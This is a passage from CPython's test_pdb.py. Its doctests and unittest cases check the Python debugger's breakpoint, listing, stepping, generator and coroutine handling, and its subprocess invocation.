the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def test_pdb_pp_repr_exc():
"""Test that do_p/do_pp do not swallow exceptions.
>>> class BadRepr:
... def __repr__(self):
... raise Exception('repr_exc')
>>> obj = BadRepr()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'p obj',
... 'pp obj',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_pp_repr_exc[2]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) p obj
*** Exception: repr_exc
(Pdb) pp obj
*** Exception: repr_exc
(Pdb) continue
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exist
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_pdb_whatis_command():
"""Test the whatis command
>>> myvar = (1,2)
>>> def myfunc():
... pass
>>> class MyClass:
... def mymethod(self):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'whatis myvar',
... 'whatis myfunc',
... 'whatis MyClass',
... 'whatis MyClass()',
... 'whatis MyClass.mymethod',
... 'whatis MyClass().mymethod',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_whatis_command[3]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) whatis myvar
<class 'tuple'>
(Pdb) whatis myfunc
Function myfunc
(Pdb) whatis MyClass
Class test.test_pdb.MyClass
(Pdb) whatis MyClass()
<class 'test.test_pdb.MyClass'>
(Pdb) whatis MyClass.mymethod
Function mymethod
(Pdb) whatis MyClass().mymethod
Method mymethod
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> reset_Breakpoint()
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 1 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
def test_pdb_issue_43318():
"""echo breakpoints cleared with filename:lineno
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3',
... 'continue'
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_43318[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) clear <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_issue_43318[0]>:3
(Pdb) continue
1
2
3
4
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
env = {**os.environ, 'PYTHONIOENCODING': 'utf-8'}
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
with open(support.TESTFN, 'wb') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function(b'', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode(),
'bœr',
('bœr', 4),
)
def test_find_function_found_with_encoding_cookie(self):
self._assert_find_function(
"""\
# coding: iso-8859-15
def foo():
pass
def bœr():
pass
def quux():
pass
""".encode('iso-8859-15'),
'bœr',
('bœr', 5),
)
def test_find_function_found_with_bom(self):
self._assert_find_function(
codecs.BOM_UTF8 + """\
def bœr():
pass
""".encode(),
'bœr',
('bœr', 1),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
